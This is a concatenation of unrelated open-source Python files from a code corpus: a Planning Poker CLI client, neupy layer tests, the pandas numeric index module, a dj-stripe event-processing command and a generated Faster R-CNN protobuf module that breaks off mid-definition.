crt_issue_description = response['result_message']['description']
print(f"'{crt_issue_title}' is the current issue.")
if len(crt_issue_description) > 0:
print(f"{crt_issue_description}")
@staticmethod
def parse_report(report):
for vote_value, vote_details in report.items():
print(f"{vote_details['vote_count']} voted for {vote_value} "
f"story points.\n"
f"{json.dumps(vote_details['voters'], indent=4)}\n")
def get_report(self, inp):
current_status = 'pending'
retry_count = 0
while current_status == 'pending' and retry_count < self.max_retries:
response = self.send_request(method='get',
route='/issue/show_results')
if response.status_code == status.HTTP_200_OK:
response_message = json.loads(response.text)['result_message']
current_status = response_message['status']
if current_status == 'done':
self.parse_report(response_message['report'])
else:
current_status = 'error'
self.print_error_response(response)
retry_count += 1
time.sleep(self.show_timeout)
def send_request(self, method, route, params=None, data=None):
full_uri = ''.join([self.url, route])
response = requests.request(method=method, url=full_uri,
params=params, json=data)
return response
def do_add_player(self, username):
"""
Add a player to the current game
"""
current_players = []
response = self.send_request(method='get',
route='/user/show_all')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
current_players = response_dict['result_message']['current_users']
else:
self.print_error_response(response)
if self.username and self.username in current_players:
print(f"You already have a username in the current game: "
f"{self.username}")
else:
crt_dict = {
'name': username
}
response = self.send_request(method='post',
route='/user/add',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
self.username = username
print(f"Player {self.username} has been added to the current "
f"game")
else:
self.print_error_response(response)
def do_current_dealer(self, inp):
"""
Show current dealer
"""
response = self.send_request(method='get',
route='/game/get_dealer')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"Current dealer is "
f"{response_dict['result_message']['current_dealer']}")
else:
self.print_error_response(response)
def do_current_issue(self, inp):
"""
Show issue that players are voting on now
"""
response = self.send_request(method='get',
route='/issue/current')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
self.print_issue(response_dict)
else:
self.print_error_response(response)
def do_current_players(self, inp):
"""
Show players that are registered for the current game
"""
response = self.send_request(method='get',
route='/user/show_all')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
current_users = response_dict['result_message']['current_users']
if len(current_users) == 0:
print("Please add players to the game")
else:
print(f"Currently playing Planning Poker: "
f"{json.dumps(current_users)}")
else:
self.print_error_response(response)
def do_current_votes(self, inp):
"""
Show if all players voted or who still has to vote
"""
response = self.send_request(method='get',
route='/issue/vote_status')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_exit(self):
"""
Command for exiting planning poker game
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/user/exit',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']['user_exit_status']}")
else:
self.print_error_response(response)
print(f"Buh-bye, {self.username}! And in case I don't see you again, "
f"good afternoon, good evening and good night!")
return True
def do_new_game(self, inp):
"""
Start new game
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/game/new',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_next_issue(self, inp):
"""
Jump to next issue, if there is one (i.e. the current issue
is the last one and we can go back to programming)
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/issue/next',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
self.print_issue(response_dict)
else:
self.print_error_response(response)
def do_previous_issue(self, inp):
"""
Jump to previous issue, if there is one (i.e. we are not on
the first issue)
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/issue/previous',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
self.print_issue(response_dict)
else:
self.print_error_response(response)
def do_remove_player(self, username):
"""
Remove a player from the current game
"""
if len(username) < 4:
print("Please use a more meaningful name")
else:
params_dict = {
'username': username
}
data_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/user/remove',
params=params_dict,
data=data_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_reset_votes(self, inp):
"""
Reset votes on current issue
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/issue/votes_reset',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_show_report(self, inp):
"""
Show vote report for current issue
"""
self.get_report(inp)
def do_user_count(self, inp):
"""
Show how many users are registered for the current game
"""
response = self.send_request(method='get',
route='/user/count')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
user_count = response_dict['result_message']['user_count']
if user_count == 1:
verb = 'is'
else:
verb = 'are'
print(f"Currently, there {verb} {user_count} registered "
f"players")
else:
self.print_error_response(response)
def do_vote_issue(self, vote_value):
"""
Vote on the current issue with the registered user here
"""
crt_dict = {
'name': self.username,
'vote_value': vote_value
}
response = self.send_request(method='put',
route='/issue/vote',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_voting_system(self, inp):
"""
Show voting system for the current game
"""
response = self.send_request(method='get',
route='/game/voting_system')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
do_EOF = do_exit
if __name__ == '__main__':
crt_config_params = {}
config_path = Path('./configs/cli_config.json')
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", type=str,
help="Configuration file name")
args = parser.parse_args()
if args.config:
config_path = Path(args.config)
if config_path.exists():
with open(config_path) as f:
try:
crt_config_params = json.load(f)
except json.decoder.JSONDecodeError as je:
print(f"Please make sure config file contains a dict in json "
f"format. An example can be found in "
f"'./configs/cli_config.json'. {je} was raised.")
else:
print(f"Please make sure the path {config_path} is correct and that "
f"the file exists. Will use default configuration parameters "
f"this time.")
MyPrompt(**crt_config_params).cmdloop()
| 36.737662 | 80 | 0.548713 |
af2e9b756a7ec250aefdf90c42c7fddcfa3ad298
| 4,666 |
py
|
Python
|
tests/layers/test_merge_layers.py
|
vishalbelsare/neupy
|
684313cdaddcad326f2169384fb15ec3aa29d991
|
[
"MIT"
] | null | null | null |
tests/layers/test_merge_layers.py
|
vishalbelsare/neupy
|
684313cdaddcad326f2169384fb15ec3aa29d991
|
[
"MIT"
] | null | null | null |
tests/layers/test_merge_layers.py
|
vishalbelsare/neupy
|
684313cdaddcad326f2169384fb15ec3aa29d991
|
[
"MIT"
] | null | null | null |
import theano
import theano.tensor as T
import numpy as np
from neupy import layers, init
from neupy.utils import asfloat
from neupy.exceptions import LayerConnectionError
from base import BaseTestCase
class ElementwiseTestCase(BaseTestCase):
def test_elementwise_basic(self):
elem_layer = layers.Elementwise(merge_function=T.add)
x1 = T.matrix()
x2 = T.matrix()
y = theano.function([x1, x2], elem_layer.output(x1, x2))
x1_matrix = asfloat(np.random.random((10, 2)))
x2_matrix = asfloat(np.random.random((10, 2)))
expected_output = x1_matrix + x2_matrix
actual_output = y(x1_matrix, x2_matrix)
np.testing.assert_array_almost_equal(expected_output, actual_output)
def test_elementwise_initialize(self):
# Suppose not to fail if you initialize
# it without connection
elem_layer = layers.Elementwise()
elem_layer.initialize()
def test_elementwise_single_input(self):
elem_layer = layers.Elementwise()
output = elem_layer.output(None)
self.assertEqual(output, None)
def test_elementwise_init_error(self):
input_layer_1 = layers.Input(10)
input_layer_2 = layers.Input(20)
elem_layer = layers.Elementwise()
layers.join(input_layer_1, elem_layer)
with self.assertRaises(LayerConnectionError):
layers.join(input_layer_2, elem_layer)
def test_elementwise_not_function(self):
with self.assertRaises(ValueError):
not_callable_object = (1, 2, 3)
layers.Elementwise(merge_function=not_callable_object)
def test_elementwise_output_shape_no_connection(self):
elem_layer = layers.Elementwise()
self.assertEqual(elem_layer.output_shape, None)
def test_elementwise_in_connections(self):
input_layer = layers.Input(2)
hidden_layer_1 = layers.Relu(1, weight=init.Constant(1),
bias=init.Constant(0))
hidden_layer_2 = layers.Relu(1, weight=init.Constant(2),
bias=init.Constant(0))
elem_layer = layers.Elementwise(merge_function=T.add)
connection = layers.join(input_layer, hidden_layer_1, elem_layer)
connection = layers.join(input_layer, hidden_layer_2, elem_layer)
connection.initialize()
self.assertEqual(elem_layer.output_shape, (1,))
x = T.matrix()
y = theano.function([x], connection.output(x))
test_input = asfloat(np.array([
[0, 1],
[-1, -1],
]))
actual_output = y(test_input)
expected_output = np.array([
[3],
[0],
])
np.testing.assert_array_almost_equal(expected_output, actual_output)
class ConcatenateTestCase(BaseTestCase):
def test_concatenate_basic(self):
concat_layer = layers.Concatenate(axis=1)
x1 = T.tensor4()
x2 = T.tensor4()
y = theano.function([x1, x2], concat_layer.output(x1, x2))
x1_tensor4 = asfloat(np.random.random((1, 2, 3, 4)))
x2_tensor4 = asfloat(np.random.random((1, 8, 3, 4)))
output = y(x1_tensor4, x2_tensor4)
self.assertEqual((1, 10, 3, 4), output.shape)
def test_concatenate_init_error(self):
input_layer_1 = layers.Input((3, 28, 28))
input_layer_2 = layers.Input((1, 28, 28))
concat_layer = layers.Concatenate(axis=2)
layers.join(input_layer_1, concat_layer)
with self.assertRaises(LayerConnectionError):
layers.join(input_layer_2, concat_layer)
def test_concatenate_conv_layers(self):
input_layer = layers.Input((3, 28, 28))
hidden_layer_1 = layers.Convolution((7, 5, 5))
hidden_layer_21 = layers.Convolution((1, 3, 3))
hidden_layer_22 = layers.Convolution((4, 3, 3))
concat_layer = layers.Concatenate(axis=1)
connection = layers.join(input_layer, hidden_layer_1, concat_layer)
connection = layers.join(input_layer, hidden_layer_21,
hidden_layer_22, concat_layer)
connection.initialize()
self.assertEqual((11, 24, 24), concat_layer.output_shape)
x = T.tensor4()
y = theano.function([x], connection.output(x))
x_tensor4 = asfloat(np.random.random((5, 3, 28, 28)))
actual_output = y(x_tensor4)
self.assertEqual((5, 11, 24, 24), actual_output.shape)
def test_elementwise_concatenate(self):
# Suppose not to fail if you initialize
# it without connection
layer = layers.Concatenate()
layer.initialize()
| 34.562963 | 76 | 0.644664 |
08881f915ef2d23f3256e3e3ce81006be77c4780
| 14,126 |
py
|
Python
|
pandas/core/indexes/numeric.py
|
zeitlinv/pandas
|
08d296f1278e08b407448c95086589e1d10285f9
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 2 |
2021-08-18T11:17:41.000Z
|
2021-08-18T11:17:53.000Z
|
pandas/core/indexes/numeric.py
|
zeitlinv/pandas
|
08d296f1278e08b407448c95086589e1d10285f9
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2021-08-30T15:10:57.000Z
|
2021-08-30T15:10:57.000Z
|
pandas/core/indexes/numeric.py
|
zeitlinv/pandas
|
08d296f1278e08b407448c95086589e1d10285f9
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2021-08-30T14:37:26.000Z
|
2021-08-30T14:37:26.000Z
|
from __future__ import annotations
from typing import (
Callable,
Hashable,
)
import warnings
import numpy as np
from pandas._libs import (
index as libindex,
lib,
)
from pandas._typing import (
Dtype,
DtypeObj,
)
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.cast import astype_nansafe
from pandas.core.dtypes.common import (
is_dtype_equal,
is_extension_array_dtype,
is_float,
is_float_dtype,
is_integer_dtype,
is_numeric_dtype,
is_scalar,
is_signed_integer_dtype,
is_unsigned_integer_dtype,
needs_i8_conversion,
pandas_dtype,
)
from pandas.core.dtypes.generic import ABCSeries
from pandas.core.indexes.base import (
Index,
maybe_extract_name,
)
_num_index_shared_docs = {}
_num_index_shared_docs[
"class_descr"
] = """
Immutable sequence used for indexing and alignment. The basic object
storing axis labels for all pandas objects. %(klass)s is a special case
of `Index` with purely %(ltype)s labels. %(extra)s.
Parameters
----------
data : array-like (1-dimensional)
dtype : NumPy dtype (default: %(dtype)s)
copy : bool
Make a copy of input ndarray.
name : object
Name to be stored in the index.
Attributes
----------
None
Methods
-------
None
See Also
--------
Index : The base pandas Index type.
Notes
-----
An Index instance can **only** contain hashable objects.
"""
class NumericIndex(Index):
_index_descr_args = {
"klass": "NumericIndex",
"ltype": "integer or float",
"dtype": "inferred",
"extra": "",
}
__doc__ = _num_index_shared_docs["class_descr"] % _index_descr_args
_typ = "numericindex"
_values: np.ndarray
_default_dtype: np.dtype | None = None
_dtype_validation_metadata: tuple[Callable[..., bool], str] = (
is_numeric_dtype,
"numeric type",
)
_is_numeric_dtype = True
_can_hold_strings = False
_is_backward_compat_public_numeric_index: bool = True
@cache_readonly
def _can_hold_na(self) -> bool:
if is_float_dtype(self.dtype):
return True
else:
return False
_engine_types: dict[np.dtype, type[libindex.IndexEngine]] = {
np.dtype(np.int8): libindex.Int8Engine,
np.dtype(np.int16): libindex.Int16Engine,
np.dtype(np.int32): libindex.Int32Engine,
np.dtype(np.int64): libindex.Int64Engine,
np.dtype(np.uint8): libindex.UInt8Engine,
np.dtype(np.uint16): libindex.UInt16Engine,
np.dtype(np.uint32): libindex.UInt32Engine,
np.dtype(np.uint64): libindex.UInt64Engine,
np.dtype(np.float32): libindex.Float32Engine,
np.dtype(np.float64): libindex.Float64Engine,
}
@property
def _engine_type(self):
return self._engine_types[self.dtype]
@cache_readonly
def inferred_type(self) -> str:
return {
"i": "integer",
"u": "integer",
"f": "floating",
}[self.dtype.kind]
def __new__(cls, data=None, dtype: Dtype | None = None, copy=False, name=None):
name = maybe_extract_name(name, data, cls)
subarr = cls._ensure_array(data, dtype, copy)
return cls._simple_new(subarr, name=name)
@classmethod
def _ensure_array(cls, data, dtype, copy: bool):
"""
Ensure we have a valid array to pass to _simple_new.
"""
cls._validate_dtype(dtype)
if not isinstance(data, (np.ndarray, Index)):
# Coerce to ndarray if not already ndarray or Index
if is_scalar(data):
raise cls._scalar_data_error(data)
# other iterable of some kind
if not isinstance(data, (ABCSeries, list, tuple)):
data = list(data)
orig = data
data = np.asarray(data, dtype=dtype)
if dtype is None and data.dtype.kind == "f":
if cls is UInt64Index and (data >= 0).all():
# https://github.com/numpy/numpy/issues/19146
data = np.asarray(orig, dtype=np.uint64)
if issubclass(data.dtype.type, str):
cls._string_data_error(data)
dtype = cls._ensure_dtype(dtype)
if copy or not is_dtype_equal(data.dtype, dtype):
# TODO: the try/except below is because it's difficult to predict the error
# and/or error message from different combinations of data and dtype.
# Efforts to avoid this try/except welcome.
# See https://github.com/pandas-dev/pandas/pull/41153#discussion_r676206222
try:
subarr = np.array(data, dtype=dtype, copy=copy)
cls._validate_dtype(subarr.dtype)
except (TypeError, ValueError):
raise ValueError(f"data is not compatible with {cls.__name__}")
cls._assert_safe_casting(data, subarr)
else:
subarr = data
if subarr.ndim > 1:
# GH#13601, GH#20285, GH#27125
raise ValueError("Index data must be 1-dimensional")
subarr = np.asarray(subarr)
return subarr
@classmethod
def _validate_dtype(cls, dtype: Dtype | None) -> None:
if dtype is None:
return
validation_func, expected = cls._dtype_validation_metadata
if not validation_func(dtype):
raise ValueError(
f"Incorrect `dtype` passed: expected {expected}, received {dtype}"
)
@classmethod
def _ensure_dtype(cls, dtype: Dtype | None) -> np.dtype | None:
"""
Ensure int64 dtype for Int64Index etc. but allow int32 etc. for NumericIndex.
Assumes dtype has already been validated.
"""
if dtype is None:
return cls._default_dtype
dtype = pandas_dtype(dtype)
assert isinstance(dtype, np.dtype)
if cls._is_backward_compat_public_numeric_index:
# dtype for NumericIndex
return dtype
else:
# dtype for Int64Index, UInt64Index etc. Needed for backwards compat.
return cls._default_dtype
def __contains__(self, key) -> bool:
"""
Check if key is a float and has a decimal. If it has, return False.
"""
if not is_integer_dtype(self.dtype):
return super().__contains__(key)
hash(key)
try:
if is_float(key) and int(key) != key:
# otherwise the `key in self._engine` check casts e.g. 1.1 -> 1
return False
return key in self._engine
except (OverflowError, TypeError, ValueError):
return False
@doc(Index.astype)
def astype(self, dtype, copy=True):
dtype = pandas_dtype(dtype)
if is_float_dtype(self.dtype):
if needs_i8_conversion(dtype):
raise TypeError(
f"Cannot convert Float64Index to dtype {dtype}; integer "
"values are required for conversion"
)
elif is_integer_dtype(dtype) and not is_extension_array_dtype(dtype):
# TODO(jreback); this can change once we have an EA Index type
# GH 13149
arr = astype_nansafe(self._values, dtype=dtype)
if isinstance(self, Float64Index):
return Int64Index(arr, name=self.name)
else:
return NumericIndex(arr, name=self.name, dtype=dtype)
elif self._is_backward_compat_public_numeric_index:
# this block is needed so e.g. NumericIndex[int8].astype("int32") returns
# NumericIndex[int32] and not Int64Index with dtype int64.
# When Int64Index etc. are removed from the code base, removed this also.
if not is_extension_array_dtype(dtype) and is_numeric_dtype(dtype):
return self._constructor(self, dtype=dtype, copy=copy)
return super().astype(dtype, copy=copy)
# ----------------------------------------------------------------
# Indexing Methods
@cache_readonly
@doc(Index._should_fallback_to_positional)
def _should_fallback_to_positional(self) -> bool:
return False
@doc(Index._convert_slice_indexer)
def _convert_slice_indexer(self, key: slice, kind: str):
if is_float_dtype(self.dtype):
assert kind in ["loc", "getitem"]
# We always treat __getitem__ slicing as label-based
# translate to locations
return self.slice_indexer(key.start, key.stop, key.step)
return super()._convert_slice_indexer(key, kind=kind)
@doc(Index._maybe_cast_slice_bound)
def _maybe_cast_slice_bound(self, label, side: str, kind=lib.no_default):
assert kind in ["loc", "getitem", None, lib.no_default]
self._deprecated_arg(kind, "kind", "_maybe_cast_slice_bound")
# we will try to coerce to integers
return self._maybe_cast_indexer(label)
# ----------------------------------------------------------------
@doc(Index._shallow_copy)
def _shallow_copy(self, values, name: Hashable = lib.no_default):
if not self._can_hold_na and values.dtype.kind == "f":
name = self._name if name is lib.no_default else name
# Ensure we are not returning an Int64Index with float data:
return Float64Index._simple_new(values, name=name)
return super()._shallow_copy(values=values, name=name)
def _convert_tolerance(self, tolerance, target):
tolerance = super()._convert_tolerance(tolerance, target)
if not np.issubdtype(tolerance.dtype, np.number):
if tolerance.ndim > 0:
raise ValueError(
f"tolerance argument for {type(self).__name__} must contain "
"numeric elements if it is list type"
)
else:
raise ValueError(
f"tolerance argument for {type(self).__name__} must be numeric "
f"if it is a scalar: {repr(tolerance)}"
)
return tolerance
def _is_comparable_dtype(self, dtype: DtypeObj) -> bool:
# If we ever have BoolIndex or ComplexIndex, this may need to be tightened
return is_numeric_dtype(dtype)
@classmethod
def _assert_safe_casting(cls, data: np.ndarray, subarr: np.ndarray) -> None:
"""
Ensure incoming data can be represented with matching signed-ness.
Needed if the process of casting data from some accepted dtype to the internal
dtype(s) bears the risk of truncation (e.g. float to int).
"""
if is_integer_dtype(subarr.dtype):
if not np.array_equal(data, subarr):
raise TypeError("Unsafe NumPy casting, you must explicitly cast")
@property
def _is_all_dates(self) -> bool:
"""
Checks that all the labels are datetime objects.
"""
return False
def _format_native_types(
self, na_rep="", float_format=None, decimal=".", quoting=None, **kwargs
):
from pandas.io.formats.format import FloatArrayFormatter
if is_float_dtype(self.dtype):
formatter = FloatArrayFormatter(
self._values,
na_rep=na_rep,
float_format=float_format,
decimal=decimal,
quoting=quoting,
fixed_width=False,
)
return formatter.get_result_as_array()
return super()._format_native_types(
na_rep=na_rep,
float_format=float_format,
decimal=decimal,
quoting=quoting,
**kwargs,
)
class IntegerIndex(NumericIndex):
"""
This is an abstract class for Int64Index, UInt64Index.
"""
_is_backward_compat_public_numeric_index: bool = False
@property
def asi8(self) -> np.ndarray:
# do not cache or you'll create a memory leak
warnings.warn(
"Index.asi8 is deprecated and will be removed in a future version",
FutureWarning,
stacklevel=2,
)
return self._values.view(self._default_dtype)
class Int64Index(IntegerIndex):
_index_descr_args = {
"klass": "Int64Index",
"ltype": "integer",
"dtype": "int64",
"extra": "",
}
__doc__ = _num_index_shared_docs["class_descr"] % _index_descr_args
_typ = "int64index"
_engine_type = libindex.Int64Engine
_default_dtype = np.dtype(np.int64)
_dtype_validation_metadata = (is_signed_integer_dtype, "signed integer")
class UInt64Index(IntegerIndex):
_index_descr_args = {
"klass": "UInt64Index",
"ltype": "unsigned integer",
"dtype": "uint64",
"extra": "",
}
__doc__ = _num_index_shared_docs["class_descr"] % _index_descr_args
_typ = "uint64index"
_engine_type = libindex.UInt64Engine
_default_dtype = np.dtype(np.uint64)
_dtype_validation_metadata = (is_unsigned_integer_dtype, "unsigned integer")
def _validate_fill_value(self, value):
# e.g. np.array([1]) we want np.array([1], dtype=np.uint64)
# see test_where_uin64
super()._validate_fill_value(value)
if hasattr(value, "dtype") and is_signed_integer_dtype(value.dtype):
if (value >= 0).all():
return value.astype(self.dtype)
raise TypeError
return value
class Float64Index(NumericIndex):
_index_descr_args = {
"klass": "Float64Index",
"dtype": "float64",
"ltype": "float",
"extra": "",
}
__doc__ = _num_index_shared_docs["class_descr"] % _index_descr_args
_typ = "float64index"
_engine_type = libindex.Float64Engine
_default_dtype = np.dtype(np.float64)
_dtype_validation_metadata = (is_float_dtype, "float")
_is_backward_compat_public_numeric_index: bool = False
| 32.473563 | 87 | 0.609514 |
fecb699e11482b5370595411b7fe70f921e358b4
| 339 |
py
|
Python
|
packages/PIPS/validation/Terapix/alphablending.py
|
DVSR1966/par4all
|
86b33ca9da736e832b568c5637a2381f360f1996
|
[
"MIT"
] | 51 |
2015-01-31T01:51:39.000Z
|
2022-02-18T02:01:50.000Z
|
packages/PIPS/validation/Terapix/alphablending.py
|
DVSR1966/par4all
|
86b33ca9da736e832b568c5637a2381f360f1996
|
[
"MIT"
] | 7 |
2017-05-29T09:29:00.000Z
|
2019-03-11T16:01:39.000Z
|
packages/PIPS/validation/Terapix/alphablending.py
|
DVSR1966/par4all
|
86b33ca9da736e832b568c5637a2381f360f1996
|
[
"MIT"
] | 12 |
2015-03-26T08:05:38.000Z
|
2022-02-18T02:01:51.000Z
|
from __future__ import with_statement # this is to work with python2.5
import terapyps
from pyps import workspace
workspace.delete("alphablending")
with terapyps.workspace("alphablending.c", name="alphablending", deleteOnClose=False) as w:
for f in w.fun:
f.terapix_code_generation(debug=True)
# w.compile(terapyps.Maker())
| 37.666667 | 91 | 0.766962 |
dd2cf44203c6b4a0c3d6a9e9e5ac39716d3a1aaf
| 4,258 |
py
|
Python
|
djstripe/management/commands/djstripe_process_events.py
|
omidraha/dj-stripe
|
5785513e88de7e4648e52723d219ed82ce82cfe2
|
[
"MIT"
] | null | null | null |
djstripe/management/commands/djstripe_process_events.py
|
omidraha/dj-stripe
|
5785513e88de7e4648e52723d219ed82ce82cfe2
|
[
"MIT"
] | null | null | null |
djstripe/management/commands/djstripe_process_events.py
|
omidraha/dj-stripe
|
5785513e88de7e4648e52723d219ed82ce82cfe2
|
[
"MIT"
] | null | null | null |
from django.core.management.base import BaseCommand
from ... import models
from ...mixins import VerbosityAwareOutputMixin
from ...settings import djstripe_settings
class Command(VerbosityAwareOutputMixin, BaseCommand):
"""Command to process all Events.
Optional arguments are provided to limit the number of Events processed.
Note: this is only guaranteed go back at most 30 days based on the
current limitation of stripe's events API. See: https://stripe.com/docs/api/events
"""
help = (
"Process all Events. Use optional arguments to limit the Events to process. "
"Note: this is only guaranteed go back at most 30 days based on the current "
"limitation of stripe's events API. See: https://stripe.com/docs/api/events"
)
def add_arguments(self, parser):
"""Add optional arugments to filter Events by."""
# Use a mutually exclusive group to prevent multiple arguments being
# specified together.
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--ids",
nargs="*",
help="An optional space separated list of specific Event IDs to sync.",
)
group.add_argument(
"--failed",
action="store_true",
help="Syncs and processes only the events that have failed webhooks.",
)
group.add_argument(
"--type",
help=(
"A string containing a specific event name,"
" or group of events using * as a wildcard."
" The list will be filtered to include only"
" events with a matching event property."
),
)
def handle(self, *args, **options):
"""Try to process Events listed from the API."""
# Set the verbosity to determine how much we output, if at all.
self.set_verbosity(options)
event_ids = options["ids"]
failed = options["failed"]
type_filter = options["type"]
# Args are mutually exclusive,
# so output what we are doing based on that assumption.
if failed:
self.output("Processing all failed events")
elif type_filter:
self.output(
"Processing all events that match {filter}".format(filter=type_filter)
)
elif event_ids:
self.output("Processing specific events {events}".format(events=event_ids))
else:
self.output("Processing all available events")
# Either use the specific event IDs to retrieve data, or use the api_list
# if no specific event IDs are specified.
if event_ids:
listed_events = (
models.Event.stripe_class.retrieve(
id=event_id, api_key=djstripe_settings.STRIPE_SECRET_KEY
)
for event_id in event_ids
)
else:
list_kwargs = {}
if failed:
list_kwargs["delivery_success"] = False
if type_filter:
list_kwargs["type"] = type_filter
listed_events = models.Event.api_list(**list_kwargs)
self.process_events(listed_events)
def process_events(self, listed_events):
# Process each listed event. Capture failures and continue,
# outputting debug information as verbosity dictates.
count = 0
total = 0
for event_data in listed_events:
try:
total += 1
event = models.Event.process(data=event_data)
count += 1
self.verbose_output(" Synced Event {id}".format(id=event.id))
except Exception as exception:
self.verbose_output(
" Failed processing Event {id}".format(id=event_data["id"])
)
self.output(" {exception}".format(exception=exception))
self.verbose_traceback()
if total == 0:
self.output(" (no results)")
else:
self.output(
" Processed {count} out of {total} Events".format(
count=count, total=total
)
)
| 36.393162 | 87 | 0.581259 |
995d2e612ca2ece917f6f767aab82e839eaf62a0
| 24,448 |
py
|
Python
|
research/object_detection/protos/faster_rcnn_pb2.py
|
janzkyle23/models
|
a8ae09e23d309f8893619387a7133bcc4db3d8a9
|
[
"Apache-2.0"
] | 5 |
2020-01-22T15:53:06.000Z
|
2021-10-05T02:45:26.000Z
|
research/object_detection/protos/faster_rcnn_pb2.py
|
janzkyle23/models
|
a8ae09e23d309f8893619387a7133bcc4db3d8a9
|
[
"Apache-2.0"
] | 6 |
2020-06-08T14:35:41.000Z
|
2022-02-10T01:52:40.000Z
|
research/object_detection/protos/faster_rcnn_pb2.py
|
janzkyle23/models
|
a8ae09e23d309f8893619387a7133bcc4db3d8a9
|
[
"Apache-2.0"
] | 7 |
2020-03-30T12:22:11.000Z
|
2021-09-18T14:06:22.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: object_detection/protos/faster_rcnn.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from object_detection.protos import anchor_generator_pb2 as object__detection_dot_protos_dot_anchor__generator__pb2
from object_detection.protos import box_predictor_pb2 as object__detection_dot_protos_dot_box__predictor__pb2
from object_detection.protos import hyperparams_pb2 as object__detection_dot_protos_dot_hyperparams__pb2
from object_detection.protos import image_resizer_pb2 as object__detection_dot_protos_dot_image__resizer__pb2
from object_detection.protos import losses_pb2 as object__detection_dot_protos_dot_losses__pb2
from object_detection.protos import post_processing_pb2 as object__detection_dot_protos_dot_post__processing__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='object_detection/protos/faster_rcnn.proto',
package='object_detection.protos',
syntax='proto2',
serialized_pb=_b('\n)object_detection/protos/faster_rcnn.proto\x12\x17object_detection.protos\x1a.object_detection/protos/anchor_generator.proto\x1a+object_detection/protos/box_predictor.proto\x1a)object_detection/protos/hyperparams.proto\x1a+object_detection/protos/image_resizer.proto\x1a$object_detection/protos/losses.proto\x1a-object_detection/protos/post_processing.proto\"\x85\x0f\n\nFasterRcnn\x12\x1b\n\x10number_of_stages\x18\x01 \x01(\x05:\x01\x32\x12\x13\n\x0bnum_classes\x18\x03 \x01(\x05\x12<\n\rimage_resizer\x18\x04 \x01(\x0b\x32%.object_detection.protos.ImageResizer\x12N\n\x11\x66\x65\x61ture_extractor\x18\x05 \x01(\x0b\x32\x33.object_detection.protos.FasterRcnnFeatureExtractor\x12N\n\x1c\x66irst_stage_anchor_generator\x18\x06 \x01(\x0b\x32(.object_detection.protos.AnchorGenerator\x12\"\n\x17\x66irst_stage_atrous_rate\x18\x07 \x01(\x05:\x01\x31\x12X\n*first_stage_box_predictor_conv_hyperparams\x18\x08 \x01(\x0b\x32$.object_detection.protos.Hyperparams\x12\x30\n%first_stage_box_predictor_kernel_size\x18\t \x01(\x05:\x01\x33\x12,\n\x1f\x66irst_stage_box_predictor_depth\x18\n \x01(\x05:\x03\x35\x31\x32\x12\'\n\x1a\x66irst_stage_minibatch_size\x18\x0b \x01(\x05:\x03\x32\x35\x36\x12\x32\n%first_stage_positive_balance_fraction\x18\x0c \x01(\x02:\x03\x30.5\x12*\n\x1f\x66irst_stage_nms_score_threshold\x18\r \x01(\x02:\x01\x30\x12*\n\x1d\x66irst_stage_nms_iou_threshold\x18\x0e \x01(\x02:\x03\x30.7\x12&\n\x19\x66irst_stage_max_proposals\x18\x0f \x01(\x05:\x03\x33\x30\x30\x12/\n$first_stage_localization_loss_weight\x18\x10 \x01(\x02:\x01\x31\x12-\n\"first_stage_objectness_loss_weight\x18\x11 \x01(\x02:\x01\x31\x12\x19\n\x11initial_crop_size\x18\x12 \x01(\x05\x12\x1b\n\x13maxpool_kernel_size\x18\x13 \x01(\x05\x12\x16\n\x0emaxpool_stride\x18\x14 \x01(\x05\x12I\n\x1asecond_stage_box_predictor\x18\x15 \x01(\x0b\x32%.object_detection.protos.BoxPredictor\x12#\n\x17second_stage_batch_size\x18\x16 